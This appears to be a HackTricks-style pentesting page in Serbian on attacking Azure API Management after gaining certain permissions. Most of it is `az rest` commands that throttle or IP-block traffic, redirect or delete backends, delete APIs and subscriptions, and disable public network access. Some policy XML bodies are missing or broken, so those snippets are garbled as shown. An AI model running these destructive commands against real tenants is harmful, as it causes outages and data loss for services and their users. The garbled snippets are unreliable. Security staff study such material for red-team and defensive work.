# Azure - API Management Post-Exploitation {{#include ../../../banners/hacktricks-training.md}} ## `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write` Napadač može iskoristiti više vektora da prouzrokuje denial of service. Da bi blokirao legitimni saobraćaj, napadač dodaje rate-limiting i quota politike sa ekstremno niskim vrednostima, čime se efektivno onemogućava normalan pristup: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis//policies/policy?api-version=2024-05-01" \ --headers "Content-Type=application/json" \ --body '{ "properties": { "format": "rawxml", "value": "" } }' ``` Da bi blokirao određene legitimne klijentske IP adrese, napadač može dodati politike filtriranja IP-a koje odbacuju zahteve sa odabranih adresa: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis//policies/policy?api-version=2024-05-01" \ --headers "Content-Type=application/json" \ --body '{ "properties": { "format": "rawxml", "value": "
1.2.3.4
1.2.3.5
" } }' ``` ## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete` Da bi prouzrokovao neuspeh zahteva, napadač može izmeniti konfiguraciju backend-a i promeniti njegov URL u nevažeću ili nedostupnu adresu: ```bash az rest --method PUT \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends/?api-version=2024-05-01" \ --headers "Content-Type=application/json" "If-Match=*" \ --body '{ "properties": { "url": "https://invalid-backend-that-does-not-exist.com", "protocol": "http" } }' ``` Ili obrišite backends: ```bash az rest --method DELETE \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//backends/?api-version=2024-05-01" \ --headers "If-Match=*" ``` ## `Microsoft.ApiManagement/service/apis/delete` Da bi učinio kritične APIs nedostupnim, napadač ih može direktno izbrisati iz API Management service: ```bash az rest --method DELETE \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//apis/?api-version=2024-05-01" \ --headers "If-Match=*" ``` ## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action` Da bi blokirao pristup sa Interneta, napadač može onemogućiti javni pristup mreži na API Management service: ```bash az rest --method PATCH \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service/?api-version=2024-05-01" \ --headers "Content-Type=application/json" \ --body '{ "properties": { "publicNetworkAccess": "Disabled" } }' ``` ## `Microsoft.ApiManagement/service/subscriptions/delete` Da bi blokirao pristup legitimnim korisnicima, napadač može obrisati API Management subscriptions: ```bash az rest --method DELETE \ --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ApiManagement/service//subscriptions/?api-version=2024-05-01" \ --headers "If-Match=*" ``` {{#include ../../../banners/hacktricks-training.md}}